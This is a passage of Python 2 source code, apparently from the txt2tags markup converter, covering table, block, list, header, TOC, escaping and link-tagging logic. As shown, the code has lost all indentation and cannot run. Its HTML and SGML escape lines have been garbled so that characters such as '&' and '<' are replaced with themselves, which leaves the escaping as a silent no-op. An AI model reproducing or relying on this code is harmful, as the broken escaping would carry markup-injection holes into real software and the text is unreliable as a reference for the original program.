if label and TAGS['anchor']:
ret = regex['x'].sub(label,TAGS['anchor'])
return ret
def _get_full_title_text(self):
"Returns the full title contents, already escaped."
ret = self.txt
# insert count_id (if any) before text
if self.count_id:
ret = '%s %s'%(self.count_id, ret)
# escape specials
ret = doEscape(TARGET, ret)
# same targets needs final escapes on title lines
# it's here because there is a 'continue' after title
if rules['finalescapetitle']:
ret = doFinalEscape(TARGET, ret)
return ret
def get(self):
"Returns the tagged title as a list."
ret = []
# maybe some anchoring before?
anchor = self._get_tagged_anchor()
self.tag = regex['_anchor'].sub(anchor, self.tag)
### compose & escape title text (TOC uses unescaped)
full_title = self._get_full_title_text()
# finish title, adding "underline" on TXT target
tagged = regex['x'].sub(full_title, self.tag)
if TARGET == 'txt':
ret.append('') # blank line before
ret.append(tagged)
ret.append(regex['x'].sub('='*len(full_title),self.tag))
ret.append('') # blank line after
else:
ret.append(tagged)
return ret
def dump_marked_toc(self, max_level=99):
"Dumps all toc itens as a valid t2t markup list"
#TODO maybe use quote+linebreaks instead lists
ret = []
toc_count = 1
for level, count_id, txt, label in self.toc:
if level > max_level: continue # ignore
indent = ' '*level
id_txt = string.lstrip('%s %s'%(count_id, txt))
label = label or self.anchor_prefix+`toc_count`
toc_count = toc_count + 1
# TOC will have links
if TAGS['anchor']:
# TOC is more readable with master topics
# not linked at number. This is a stoled
# idea from Windows .CHM help files
if CONF['enum-title'] and level == 1:
tocitem = '%s+ [""%s"" #%s]'%(
indent, txt, label)
else:
tocitem = '%s- [""%s"" #%s]'%(
indent, id_txt, label)
# no links on TOC, just text
else:
# man don't reformat TOC lines, cool!
if TARGET in ['txt', 'man']:
tocitem = '%s""%s""' %(
indent, id_txt)
else:
tocitem = '%s- ""%s""'%(
indent, id_txt)
ret.append(tocitem)
return ret
##############################################################################
#TODO check all this table mess
# trata linhas TABLE, com as prop do parse_row
# o metodo table() do BLOCK xunxa e troca as celulas pelas parseadas
class TableMaster:
def __init__(self, line=''):
self.rows = []
self.border = 0
self.align = 'Left'
self.cellalign = []
if line:
prop = self.parse_row(line)
self.border = prop['border']
self.align = prop['align']
self.cellalign = prop['cellalign']
def _get_open_tag(self):
topen = TAGS['tableOpen']
tborder = TAGS['tableBorder']
talign = TAGS['tableAlign'+self.align]
calignsep = TAGS['tableColAlignSep']
calign = ''
# the first line defines if table has border or not
if not self.border: tborder = ''
# set the columns alignment
if rules['tablecellaligntype'] == 'column':
calign = map(lambda x: TAGS['tableColAlign%s'%x],
self.cellalign)
calign = string.join(calign, calignsep)
# align full table, set border and Column align (if any)
topen = regex['_tableAlign' ].sub(talign , topen)
topen = regex['_tableBorder' ].sub(tborder, topen)
topen = regex['_tableColAlign'].sub(calign , topen)
# tex table spec, border or not: {|l|c|r|} , {lcr}
if calignsep and not self.border:
# remove cell align separator
topen = string.replace(topen, calignsep, '')
return topen
def _get_cell_align(self, cells):
ret = []
for cell in cells:
align = 'Left'
if string.strip(cell):
if cell[0] == ' ' and cell[-1] == ' ':
align = 'Center'
elif cell[0] == ' ':
align = 'Right'
ret.append(align)
return ret
def _tag_cells(self, rowdata):
row = []
cells = rowdata['cells']
open = TAGS['tableCellOpen']
close = TAGS['tableCellClose']
sep = TAGS['tableCellSep']
calign = map(lambda x: TAGS['tableCellAlign'+x],
rowdata['cellalign'])
# maybe is it a title row?
if rowdata['title']:
open = TAGS['tableTitleCellOpen'] or open
close = TAGS['tableTitleCellClose'] or close
sep = TAGS['tableTitleCellSep'] or sep
# should we break the line on *each* table cell?
if rules['breaktablecell']: close = close+'\n'
# cells pre processing
if rules['tablecellstrip']:
cells = map(lambda x: string.strip(x), cells)
if rowdata['title'] and rules['tabletitlerowinbold']:
cells = map(lambda x: enclose_me('fontBold',x), cells)
# add cell BEGIN/END tags
for cell in cells:
# insert cell align into open tag (if cell is alignable)
if rules['tablecellaligntype'] == 'cell':
copen = string.replace(open,'\a',calign.pop(0))
else:
copen = open
row.append(copen + cell + close)
# maybe there are cell separators?
return string.join(row, sep)
def add_row(self, cells):
self.rows.append(cells)
def parse_row(self, line):
# default table proprierties
ret = {'border':0,'title':0,'align':'Left',
'cells':[],'cellalign':[]}
# detect table align (and remove spaces mark)
if line[0] == ' ': ret['align'] = 'Center'
line = string.lstrip(line)
# detect title mark
if line[1] == '|': ret['title'] = 1
# delete trailing spaces after last cell border
line = re.sub('\|\s*$','|', line)
# detect (and delete) border mark (and leading space)
if line[-1] == '|': ret['border'] = 1 ; line = line[:-2]
# delete table mark
line = regex['table'].sub('', line)
# split cells
ret['cells'] = string.split(line, ' | ')
# find cells align
ret['cellalign'] = self._get_cell_align(ret['cells'])
Debug('Table Prop: %s' % ret, 2)
return ret
def dump(self):
open = self._get_open_tag()
rows = self.rows
close = TAGS['tableClose']
rowopen = TAGS['tableRowOpen']
rowclose = TAGS['tableRowClose']
rowsep = TAGS['tableRowSep']
titrowopen = TAGS['tableTitleRowOpen'] or rowopen
titrowclose = TAGS['tableTitleRowClose'] or rowclose
if rules['breaktablelineopen']:
rowopen = rowopen + '\n'
titrowopen = titrowopen + '\n'
# tex gotchas
if TARGET == 'tex':
if not self.border:
rowopen = titrowopen = ''
else:
close = rowopen + close
# now we tag all the table cells on each row
#tagged_cells = map(lambda x: self._tag_cells(x), rows) #!py15
tagged_cells = []
for cell in rows: tagged_cells.append(self._tag_cells(cell))
# add row separator tags between lines
tagged_rows = []
if rowsep:
#!py15
#tagged_rows = map(lambda x:x+rowsep, tagged_cells)
for cell in tagged_cells:
tagged_rows.append(cell+rowsep)
# remove last rowsep, because the table is over
tagged_rows[-1] = string.replace(
tagged_rows[-1], rowsep, '')
# add row BEGIN/END tags for each line
else:
for rowdata in rows:
if rowdata['title']:
o,c = titrowopen, titrowclose
else:
o,c = rowopen, rowclose
row = tagged_cells.pop(0)
tagged_rows.append(o + row + c)
fulltable = [open] + tagged_rows + [close]
if rules['blankendtable']: fulltable.append('')
return fulltable
##############################################################################
class BlockMaster:
"TIP: use blockin/out to add/del holders"
def __init__(self):
self.BLK = []
self.HLD = []
self.PRP = []
self.depth = 0
self.last = ''
self.tableparser = None
self.contains = {
'para' :['passthru','raw'],
'verb' :[],
'table' :[],
'raw' :[],
'passthru':[],
'quote' :['quote','passthru','raw'],
'list' :['list' ,'numlist' ,'deflist','para','verb',
'raw' ,'passthru'],
'numlist' :['list' ,'numlist' ,'deflist','para','verb',
'raw' ,'passthru'],
'deflist' :['list' ,'numlist' ,'deflist','para','verb',
'raw' ,'passthru']
}
self.allblocks = self.contains.keys()
def block(self):
if not self.BLK: return ''
return self.BLK[-1]
def isblock(self, name=''):
return self.block() == name
def prop(self, key):
if not self.PRP: return ''
return self.PRP[-1].get(key) or ''
def propset(self, key, val):
self.PRP[-1][key] = val
#Debug('BLOCK prop ++: %s->%s'%(key,repr(val)), 1)
#Debug('BLOCK props: %s'%(repr(self.PRP)), 1)
def hold(self):
if not self.HLD: return []
return self.HLD[-1]
def holdadd(self, line):
if self.block()[-4:] == 'list': line = [line]
self.HLD[-1].append(line)
Debug('HOLD add: %s'%repr(line), 5)
Debug('FULL HOLD: %s'%self.HLD, 2)
def holdaddsub(self, line):
self.HLD[-1][-1].append(line)
Debug('HOLD addsub: %s'%repr(line), 5)
Debug('FULL HOLD: %s'%self.HLD, 2)
def holdextend(self, lines):
if self.block()[-4:] == 'list': lines = [lines]
self.HLD[-1].extend(lines)
Debug('HOLD extend: %s'%repr(lines), 5)
Debug('FULL HOLD: %s'%self.HLD, 2)
def blockin(self, block):
ret = []
if block not in self.allblocks:
Error("Invalid block '%s'"%block)
# first, let's close other possible open blocks
while self.block() and block not in self.contains[self.block()]:
ret.extend(self.blockout())
# now we can gladly add this new one
self.BLK.append(block)
self.HLD.append([])
self.PRP.append({})
if block == 'table': self.tableparser = TableMaster()
# deeper and deeper
self.depth = len(self.BLK)
Debug('block ++ (%s): %s' % (block,self.BLK), 6)
return ret
def blockout(self):
if not self.BLK: Error('No block to pop')
self.last = self.BLK.pop()
tagged = getattr(self, self.last)()
parsed = self.HLD.pop()
self.PRP.pop()
self.depth = len(self.BLK)
if self.last == 'table': del self.tableparser
# inserting a nested block into mother
if self.block():
if self.block()[-4:] == 'list':
self.HLD[-1][-1].append(tagged)
else:
self.HLD[-1].append(tagged)
tagged = [] # reset. mother will have it all
Debug('block -- (%s): %s' % (self.last,self.BLK), 6)
Debug('RELEASED (%s): %s' % (self.last,parsed), 6)
if tagged: Debug('DUMPED: %s'%tagged, 2)
return tagged
def _last_escapes(self, line):
return doFinalEscape(TARGET, line)
def _get_escaped_hold(self):
ret = []
for line in self.hold():
linetype = type(line)
if linetype == type(''):
ret.append(self._last_escapes(line))
elif linetype == type([]):
ret.extend(line)
else:
Error("BlockMaster: Unknown HOLD item type:"
" %s"%linetype)
return ret
def _remove_twoblanks(self, lastitem):
if len(lastitem) > 1 and lastitem[-2:] == ['','']:
return lastitem[:-2]
return lastitem
def passthru(self):
return self.hold()
def raw(self):
lines = self.hold()
return map(lambda x: doEscape(TARGET, x), lines)
def para(self):
tagged = []
open = TAGS['paragraphOpen']
close = TAGS['paragraphClose']
lines = self._get_escaped_hold()
# open (or not) paragraph
if not open+close and self.last == 'para':
pass # avoids multiple blank lines
else:
tagged.append(open)
# pagemaker likes a paragraph as a single long line
if rules['onelinepara']:
tagged.append(string.join(lines,' '))
# others are normal :)
else:
tagged.extend(lines)
tagged.append(close)
# very very very very very very very very very UGLY fix
# needed because <center> can't appear inside <p>
try:
if len(lines) == 1 and \
TARGET in ('html', 'xhtml') and \
re.match('^\s*<center>.*</center>\s*$', lines[0]):
tagged = [lines[0]]
except: pass
return tagged
def verb(self):
"Verbatim lines are not masked, so there's no need to unmask"
tagged = []
tagged.append(TAGS['blockVerbOpen'])
for line in self.hold():
if not rules['verbblocknotescaped']:
line = doEscape(TARGET,line)
if rules['indentverbblock']:
line = ' '+line
if rules['verbblockfinalescape']:
line = doFinalEscape(TARGET, line)
tagged.append(line)
#TODO maybe use if not TAGS['blockVerbClose']
if TARGET != 'pm6':
tagged.append(TAGS['blockVerbClose'])
return tagged
def table(self):
# rewrite all table cells by the unmasked and escaped data
lines = self._get_escaped_hold()
for i in range(len(lines)):
cells = string.split(lines[i], SEPARATOR)
self.tableparser.rows[i]['cells'] = cells
return self.tableparser.dump()
def quote(self):
tagged = []
myre = regex['quote']
open = TAGS['blockQuoteOpen'] # block based
close = TAGS['blockQuoteClose']
qline = TAGS['blockQuoteLine'] # line based
indent = tagindent = '\t'*self.depth
if rules['tagnotindentable']: tagindent = ''
if not rules['keepquoteindent']: indent = ''
if open: tagged.append(tagindent+open) # open block
for item in self.hold():
if type(item) == type([]):
tagged.extend(item) # subquotes
else:
item = myre.sub('', item) # del TABs
if rules['barinsidequote']:
item = get_tagged_bar(item)
item = self._last_escapes(item)
item = qline*self.depth + item
tagged.append(indent+item) # quote line
if close: tagged.append(tagindent+close) # close block
return tagged
def deflist(self): return self.list('deflist')
def numlist(self): return self.list('numlist')
def list(self, name='list'):
tagged = []
items = self.hold()
indent = self.prop('indent')
tagindent = indent
listopen = TAGS.get(name+'Open')
listclose = TAGS.get(name+'Close')
listline = TAGS.get(name+'ItemLine')
itemcount = 0
if rules['tagnotindentable']: tagindent = ''
if not rules['keeplistindent']: indent = ''
if name == 'deflist':
itemopen = TAGS[name+'Item1Open']
itemclose = TAGS[name+'Item2Close']
itemsep = TAGS[name+'Item1Close']+\
TAGS[name+'Item2Open']
else:
itemopen = TAGS[name+'ItemOpen']
itemclose = TAGS[name+'ItemClose']
itemsep = ''
# ItemLine: number of leading chars identifies list depth
if listline:
itemopen = listline*self.depth
# dirty fix for mgp
if name == 'numlist': itemopen = itemopen + '\a. '
# remove two-blanks from list ending mark, to avoid <p>
items[-1] = self._remove_twoblanks(items[-1])
# open list (not nestable lists are only opened at mother)
if listopen and not \
(rules['listnotnested'] and BLOCK.depth != 1):
tagged.append(tagindent+listopen)
# tag each list item (multine items)
itemopenorig = itemopen
for item in items:
# add "manual" item count for noautonum targets
itemcount = itemcount + 1
if name == 'numlist' and not rules['autonumberlist']:
n = str(itemcount)
itemopen = regex['x'].sub(n, itemopenorig)
del n
item[0] = self._last_escapes(item[0])
if name == 'deflist':
term, rest = string.split(item[0],SEPARATOR,1)
item[0] = rest
if not item[0]: del item[0] # to avoid <p>
tagged.append(tagindent+itemopen+term+itemsep)
else:
fullitem = tagindent+itemopen
tagged.append(string.replace(
item[0], SEPARATOR, fullitem))
del item[0]
# process next lines for this item (if any)
for line in item:
if type(line) == type([]): # sublist inside
tagged.extend(line)
else:
line = self._last_escapes(line)
# blank lines turns to <p>
if not line and rules['parainsidelist']:
line = string.rstrip(indent +\
TAGS['paragraphOpen']+\
TAGS['paragraphClose'])
if not rules['keeplistindent']:
line = string.lstrip(line)
tagged.append(line)
# close item (if needed)
if itemclose: tagged.append(tagindent+itemclose)
# close list (not nestable lists are only closed at mother)
if listclose and not \
(rules['listnotnested'] and BLOCK.depth != 1):
tagged.append(tagindent+listclose)
if rules['blankendmotherlist'] and BLOCK.depth == 1:
tagged.append('')
return tagged
##############################################################################
def dumpConfig(source_raw, parsed_config):
onoff = {1:_('ON'), 0:_('OFF')}
data = [
(_('RC file') , RC_RAW ),
(_('source document'), source_raw ),
(_('command line') , CMDLINE_RAW)
]
# first show all RAW data found
for label, cfg in data:
print _('RAW config for %s')%label
for target,key,val in cfg:
target = '(%s)'%target
key = dotted_spaces("%-14s"%key)
val = val or _('ON')
print ' %-8s %s: %s'%(target,key,val)
print
# then the parsed results of all of them
print _('Full PARSED config')
keys = parsed_config.keys() ; keys.sort() # sorted
for key in keys:
val = parsed_config[key]
# filters are the last
if key in ['preproc', 'postproc']:
continue
# flag beautifier
if key in FLAGS.keys()+ACTIONS.keys():
val = onoff.get(val) or val
# list beautifier
if type(val) == type([]):
if key == 'options': sep = ' '
else : sep = ', '
val = string.join(val, sep)
print "%25s: %s"%(dotted_spaces("%-14s"%key),val)
print
print _('Active filters')
for filter in ['preproc','postproc']:
for rule in parsed_config.get(filter) or []:
print "%25s: %s -> %s"%(
dotted_spaces("%-14s"%filter),rule[0],rule[1])
def get_file_body(file):
"Returns all the document BODY lines"
return process_source_file(file, noconf=1)[1][2]
def finish_him(outlist, config):
"Writing output to screen or file"
outfile = config['outfile']
outlist = unmaskEscapeChar(outlist)
# do PostProc
if config['postproc']:
postoutlist = []
errmsg = _('Invalid PostProc filter regex')
for line in outlist:
for patt,repl in config['postproc']:
try : line = re.sub(patt, repl, line)
except: Error("%s: '%s'"% (errmsg,patt))
postoutlist.append(line)
outlist = postoutlist[:]
if outfile == STDOUT:
if GUI:
return outlist, config
else:
for line in outlist: print line
else:
Savefile(outfile, addLineBreaks(outlist))
if not GUI: print _('%s wrote %s')%(my_name,outfile)
if config['split']:
print "--- html..."
sgml2html = 'sgml2html -s %s -l %s %s'%(
config['split'],config['lang'] or lang,outfile)
print "Running system command:", sgml2html
os.system(sgml2html)
def toc_maker(toc, config):
"Compose TOC list 'by hand'"
ret = []
# TOC is a tag, so there's nothing to do here
if TAGS['TOC'] and not config['toc-only']: return []
# TOC is a valid t2t marked text (list type), that is converted
if config['toc'] or config['toc-only']:
fakeconf = config.copy()
fakeconf['headers'] = 0
fakeconf['toc-only'] = 0
fakeconf['mask-email'] = 0
fakeconf['preproc'] = []
fakeconf['postproc'] = []
fakeconf['css-suggar'] = 0
ret,foo = convert(toc, fakeconf)
# TOC between bars (not for --toc-only)
if config['toc']:
if TAGS['tocOpenCss'] and config['css-suggar']:
ret = [TAGS['tocOpenCss']] +ret +[TAGS['tocCloseCss']]
else:
para = TAGS['paragraphOpen']+TAGS['paragraphClose']
tag = regex['x'].sub('-'*72,TAGS['bar1'])
tocbar = [para, tag, para]
ret = tocbar + ret + tocbar
open, close = TAGS['tocOpen'], TAGS['tocClose']
if open : ret = [open] + ret
if close: ret = ret + [close]
return ret
def doHeader(headers, config):
if not config['headers']: return []
if not headers: headers = ['','','']
target = config['target']
if not HEADER_TEMPLATE.has_key(target):
Error("doheader: Unknow target '%s'"%target)
if target in ['html','xhtml'] and config.get('css-suggar'):
template = string.split(HEADER_TEMPLATE[target+'css'], '\n')
else:
template = string.split(HEADER_TEMPLATE[target], '\n')
head_data = {'STYLE':'', 'ENCODING':''}
for key in head_data.keys():
val = config.get(string.lower(key))
if key == 'ENCODING': val = get_encoding_string(val, target)
head_data[key] = val
# parse header contents
for i in 0,1,2:
contents = doDateMacro(headers[i]) # expand %%date
# Escapes - on tex, just do it if any \tag{} present
if target != 'tex' or \
(target == 'tex' and re.search(r'\\\w+{', contents)):
contents = doEscape(target, contents)
head_data['HEADER%d'%(i+1)] = contents
Debug("Header Data: %s"%head_data, 1)
# scan for empty dictionary keys
# if found, scan template lines for that key reference
# if found, remove the reference
# if there isn't any other key reference on the same line, remove it
for key in head_data.keys():
if head_data.get(key): continue
for line in template:
if string.count(line, '%%(%s)s'%key):
sline = string.replace(line, '%%(%s)s'%key, '')
if not re.search(r'%\([A-Z0-9]+\)s', sline):
template.remove(line)
# populate template with data
template = string.join(template, '\n') % head_data
### post processing
#
# let tex format today
# DISABLED: not a good idea have date format different on tex
#if target == 'tex' and head_data['HEADER3'] == currdate:
# template = re.sub(r'\\date\{.*?}', r'\date', template)
return string.split(template, '\n')
def doDateMacro(line):
re_date = getRegexes()['date']
while re_date.search(line):
m = re_date.search(line)
fmt = m.group('fmt') or ''
dateme = currdate
if fmt: dateme = strftime(fmt,localtime(time()))
line = re_date.sub(dateme,line,1)
return line
def doCommentLine(txt):
# the -- string ends a (h|sg|xht)ml comment :(
txt = maskEscapeChar(txt)
if string.count(TAGS['comment'], '--') and \
string.count(txt, '--'):
txt = re.sub('-(?=-)', r'-\\', txt)
if TAGS['comment']:
return regex['x'].sub(txt, TAGS['comment'])
return ''
def doFooter(config):
if not config['headers']: return []
ret = []
target = config['target']
cmdline = config['realcmdline']
typename = target
if target == 'tex': typename = 'LaTeX2e'
ppgd = '%s code generated by %s %s (%s)'%(
typename,my_name,my_version,my_url)
cmdline = 'cmdline: %s %s'%(my_name, string.join(cmdline, ' '))
ret.append('\n'+doCommentLine(ppgd))
ret.append(doCommentLine(cmdline))
ret.append(TAGS['EOD'])
return ret
def doEscape(target,txt):
"Target-specific special escapes. Apply *before* insert any tag."
if target in ['html','sgml','xhtml']:
txt = re.sub('&','&',txt)
txt = re.sub('<','<',txt)
txt = re.sub('>','>',txt)
if target == 'sgml':
txt = re.sub('\xff','ÿ',txt) # "+y
elif target == 'pm6':
txt = re.sub('<','<\#60>',txt)
elif target == 'mgp':
txt = re.sub('^%',' %',txt) # add leading blank to avoid parse
elif target == 'man':
txt = re.sub("^([.'])", '\\&\\1',txt) # command ID
txt = string.replace(txt,ESCCHAR, ESCCHAR+'e') # \e
elif target == 'tex':
# mark literal \ to be changed to $\backslash$ later
txt = string.replace( txt, ESCCHAR, '@@LaTeX-escaping-SUX@@')
txt = re.sub('([#$&%{}])', ESCCHAR+r'\1' , txt) # \%
txt = re.sub('([~^])' , ESCCHAR+r'\1{}', txt) # \~{}
txt = re.sub('([<|>])' , r'$\1$', txt) # $>$
txt = string.replace(txt, '@@LaTeX-escaping-SUX@@',
maskEscapeChar(r'$\backslash$'))
# TIP the _ is escaped at the end
return txt
# TODO man: where - really needs to be escaped?
def doFinalEscape(target, txt):
"Last escapes of each line"
if target == 'pm6' : txt = string.replace(txt,ESCCHAR+'<',r'<\#92><')
elif target == 'man' : txt = string.replace(txt, '-', r'\-')
elif target == 'tex' : txt = string.replace(txt, '_', r'\_')
elif target == 'sgml': txt = string.replace(txt, '[', '[')
return txt
def EscapeCharHandler(action, data):
"Mask/Unmask the Escape Char on the given string"
if not string.strip(data): return data
if action not in ['mask','unmask']:
Error("EscapeCharHandler: Invalid action '%s'"%action)
if action == 'mask': return string.replace(data,'\\',ESCCHAR)
else: return string.replace(data,ESCCHAR,'\\')
def maskEscapeChar(data):
"Replace any Escape Char \ with a text mask (Input: str or list)"
if type(data) == type([]):
return map(lambda x: EscapeCharHandler('mask', x), data)
return EscapeCharHandler('mask',data)
def unmaskEscapeChar(data):
"Undo the Escape char \ masking (Input: str or list)"
if type(data) == type([]):
return map(lambda x: EscapeCharHandler('unmask', x), data)
return EscapeCharHandler('unmask',data)
def addLineBreaks(list):
"use LB to respect sys.platform"
ret = []
for line in list:
line = string.replace(line,'\n',LB) # embedded \n's
ret.append(line+LB) # add final line break
return ret
def enclose_me(tagname, txt):
return TAGS.get(tagname+'Open') + txt + TAGS.get(tagname+'Close')
def beautify_me(name, line):
"where name is: bold, italic or underline"
name = 'font%s' % string.capitalize(name)
open = TAGS['%sOpen'%name]
close = TAGS['%sClose'%name]
txt = r'%s\1%s'%(open, close)
line = regex[name].sub(txt,line)
return line
def get_tagged_link(label, url):
ret = ''
target = CONF['target']
image_re = regex['img']
# set link type
if regex['email'].match(url):
linktype = 'email'
else:
linktype = 'url';
# escape specials from TEXT parts
label = doEscape(target,label)
# escape specials from link URL
if rules['linkable'] and rules['escapeurl']:
url = doEscape(target, url)
# if not linkable, the URL is plain text, that needs escape
if not rules['linkable']:
if target == 'tex':
url = re.sub('^#', '\#', url) # ugly, but compile
else:
url = doEscape(target,url)
# adding protocol to guessed link
guessurl = ''
if linktype == 'url' and \
re.match(regex['_urlskel']['guess'], url):
if url[0] == 'w': guessurl = 'http://' +url
else : guessurl = 'ftp://' +url
# not link aware targets -> protocol is useless
if not rules['linkable']: guessurl = ''
# simple link (not guessed)
if not label and not guessurl:
if CONF['mask-email'] and linktype == 'email':
# do the email mask feature (no TAGs, just text)
url = string.replace(url,'@',' (a) ')
url = string.replace(url,'.',' ')
url = "<%s>" % url
if rules['linkable']: url = doEscape(target, url)
ret = url
else:
# just add link data to tag
tag = TAGS[linktype]
ret = regex['x'].sub(url,tag)
# named link or guessed simple link
else:
# adjusts for guessed link
if not label: label = url # no protocol
if guessurl : url = guessurl # with protocol
# image inside link!
if image_re.match(label):
if rules['imglinkable']: # get image tag
label = parse_images(label)
else: # img@link !supported
label = "(%s)"%image_re.match(label).group(1)
# putting data on the right appearance order
if rules['linkable']:
urlorder = [url, label] # link before label
else:
urlorder = [label, url] # label before link
# add link data to tag (replace \a's)
ret = TAGS["%sMark"%linktype]
for data in urlorder:
ret = regex['x'].sub(data,ret,1)
return ret
def parse_deflist_term(line):
"Extract and parse definition list term contents"
img_re = regex['img']
term = regex['deflist'].search(line).group(3)
# mask image inside term as (image.jpg), where not supported
if not rules['imgasdefterm'] and img_re.search(term):
while img_re.search(term):
imgfile = img_re.search(term).group(1)
term = img_re.sub('(%s)'%imgfile, term, 1)
#TODO tex: escape ] on term. \], \rbrack{} and \verb!]! don't work :(
return term
def get_tagged_bar(line):
m = regex['bar'].search(line)
if not m: return line
txt = m.group(2)
# set bar type
if txt[0] == '=': bar = TAGS['bar2']
else : bar = TAGS['bar1']
# to avoid comment tag confusion like <!-- ------ -->
if string.count(TAGS['comment'], '--'):
txt = string.replace(txt,'--','__')
# tag line
return regex['x'].sub(txt, bar)
def get_image_align(line):
"Return the image (first found) align for the given line"
# first clear marks that can mess align detection
line = re.sub(SEPARATOR+'$', '', line) # remove deflist sep
line = re.sub('^'+SEPARATOR, '', line) # remove list sep
line = re.sub('^[\t]+' , '', line) # remove quote mark
# get image position on the line
m = regex['img'].search(line)
ini = m.start() ; head = 0
end = m.end() ; tail = len(line)
# the align detection algorithm
if ini == head and end != tail: align = 'left' # ^img + text$
elif ini != head and end == tail: align = 'right' # ^text + img$
else : align = 'middle' # default align
# some special cases
if BLOCK.isblock('table'): align = 'middle' # ignore when table
if TARGET == 'mgp' and align == 'middle': align = 'center'
return align
# reference: http://www.iana.org/assignments/character-sets
# http://www.drclue.net/F1.cgi/HTML/META/META.html
def get_encoding_string(enc, target):
if not enc: return ''
# target specific translation table
translate = {
'tex': {
# missing: ansinew , applemac , cp437 , cp437de , cp865
'us-ascii' : 'ascii',
'windows-1250': 'cp1250',
'windows-1252': 'cp1252',
'ibm850' : 'cp850',
'ibm852' : 'cp852',
'iso-8859-1' : 'latin1',
'iso-8859-2' : 'latin2',
'iso-8859-3' : 'latin3',
'iso-8859-4' : 'latin4',
'iso-8859-5' : 'latin5',
'iso-8859-9' : 'latin9',
'koi8-r' : 'koi8-r'
}
}
# normalization
enc = re.sub('(?i)(us[-_]?)?ascii|us|ibm367','us-ascii' , enc)
enc = re.sub('(?i)(ibm|cp)?85([02])' ,'ibm85\\2' , enc)
enc = re.sub('(?i)(iso[_-]?)?8859[_-]?' ,'iso-8859-' , enc)
enc = re.sub('iso-8859-($|[^1-9]).*' ,'iso-8859-1', enc)
# apply translation table
try: enc = translate[target][string.lower(enc)]
except: pass
return enc
##############################################################################
##MerryChristmas,IdontwanttofighttonightwithyouImissyourbodyandIneedyourlove##
##############################################################################
def process_source_file(file, noconf=0):
"""
Find and Join all the configuration available for a source file.
No sanity checkings are done on this step.
It also extracts the source document parts into separate holders.
The config scan order is:
1. The user configuration file (i.e. $HOME/.txt2tagsrc)
2. The source document's CONF area
3. The command line options
The return data is a tuple of two items:
1. The parsed config dictionary
2. The document's parts, as a (head, conf, body) tuple
All the convertion process will be based on the data and
configuration returned by this function.
The source files is readed on this step only.
"""
source = SourceDocument(file)
head, conf, body = source.split()
Message(_("Source document contents stored"),2)
if not noconf:
# read document config
source_raw = source.get_raw_config()
# join all the config directives found, then parse it
full_raw = RC_RAW + source_raw + CMDLINE_RAW
Message(_("Parsing and saving all config found (%03d items)")%(
len(full_raw)),1)
full_parsed = ConfigMaster(full_raw).parse()
# add manually the filemane to the conf dic
full_parsed['sourcefile'] = file
# maybe should we dump the config found?
if full_parsed.get('dump-config'):
dumpConfig(source_raw, full_parsed)
sys.exit()
# okay, all done
Debug("FULL config for this file: %s"%full_parsed, 1)
else:
full_parsed = {}
return full_parsed, (head,conf,body)
def get_infiles_config(infiles):
"""Find and Join into a single list, all configuration available
for each input file. This function is supposed to be the very
first one to be called, before any processing.
"""
ret = []
if not infiles: return []
for infile in infiles:
ret.append((process_source_file(infile)))
return ret
def convert_this_files(configs):
global CONF
for myconf,doc in configs: # multifile support
target_head = []
target_toc = []
target_body = []
target_foot = []
source_head, source_conf, source_body = doc
myconf = ConfigMaster().sanity(myconf)
# compose the target file Headers
#TODO escape line before?
#TODO see exceptions by tex and mgp
Message(_("Composing target Headers"),1)
target_head = doHeader(source_head, myconf)
# parse the full marked body into tagged target
first_body_line = (len(source_head) or 1)+ len(source_conf) + 1
Message(_("Composing target Body"),1)
target_body, marked_toc = convert(source_body, myconf,
firstlinenr=first_body_line)
# make TOC (if needed)
Message(_("Composing target TOC"),1)
target_toc = toc_maker(marked_toc,myconf)
# compose the target file Footer
Message(_("Composing target Footer"),1)
target_foot = doFooter(myconf)
# finally, we have our document
outlist = target_head + target_toc + target_body + target_foot
# if on GUI, abort before finish_him
# else, write results to file or STDOUT
if GUI:
return outlist, myconf
else:
Message(_("Saving results to the output file"),1)
finish_him(outlist, myconf)
def parse_images(line):
"Tag all images found"
while regex['img'].search(line) and TAGS['img'] != '[\a]':
txt = regex['img'].search(line).group(1)
tag = TAGS['img']
# HTML, XHTML and mgp!
if rules['imgalignable']:
align = get_image_align(line)
# add align on tag
tag = regex['_imgAlign'].sub(align, tag, 1)
# dirty fix to allow centered solo images
if align == 'middle' and TARGET in ['html','xhtml']:
rest = regex['img'].sub('',line,1)
if re.match('^\s+$', rest):
tag = "<center>%s</center>" %tag
if TARGET == 'tex': tag = re.sub(r'\\b',r'\\\\b',tag)
line = regex['img'].sub(tag,line,1)
line = regex['x'].sub(txt,line,1)
return line
def add_inline_tags(line):
# beautifiers
for beauti in ['Bold', 'Italic', 'Underline']:
if regex['font%s'%beauti].search(line):
line = beautify_me(beauti, line)
line = parse_images(line)
return line
def get_include_contents(file, path=''):
"Parses %!include: value and extract file contents"
ids = {'`':'verb', '"':'raw', "'":'passthru' }
id = 't2t'
# set include type and remove identifier marks
mark = file[0]
if mark in ids.keys():
if file[:2] == file[-2:] == mark*2:
id = ids[mark] # set type
file = file[2:-2] # remove marks
# handle remote dir execution
filepath = os.path.join(path, file)
# read included file contents
lines = Readfile(filepath, remove_linebreaks=1)
# default txt2tags marked text, just BODY matters
if id == 't2t':
lines = get_file_body(filepath)
lines.insert(0, '%%INCLUDED(%s) starts here: %s'%(id,file))
lines.append('%%INCLUDED(%s) ends here: %s'%(id,file))
return id, lines
def convert(bodylines, config, firstlinenr=1):
# global vars for doClose*()
global TAGS, regex, rules, TARGET, BLOCK, CONF
CONF = config
target = CONF['target']
TAGS = getTags(target)
rules = getRules(target)
regex = getRegexes()
TARGET = target # save for buggy functions that need global
BLOCK = BlockMaster()
MASK = MaskMaster()
TITLE = TitleMaster()
ret = []
f_lastwasblank = 0
# if TOC is a header tag, add it
if CONF['toc'] and TAGS['TOC']:
ret.append(TAGS['TOC']+'\n')
# no forced indent for verbatim block when using CSS
if target in ('html','xhtml') and CONF['css-suggar']:
rules['indentverbblock'] = 0
# let's mark it up!
linenr = firstlinenr-1
lineref = 0
while lineref < len(bodylines):
# defaults
MASK.reset()
results_box = ''
untouchedline = bodylines[lineref]
line = re.sub('[\n\r]+$','',untouchedline) # del line break
# apply PreProc rules
if CONF['preproc']:
errmsg = _('Invalid PreProc filter regex')
for patt,repl in CONF['preproc']:
try : line = re.sub(patt, repl, line)
except: Error("%s: '%s'"% (errmsg,patt))
line = maskEscapeChar(line) # protect \ char
linenr = linenr +1
lineref = lineref +1
Debug(repr(line), 3, linenr) # heavy debug: show each line
# any NOT table line (or comment), closes an open table
if ( BLOCK.isblock('table') or
( BLOCK.isblock('verb') and
BLOCK.prop('mapped') == 'table'
)
) \
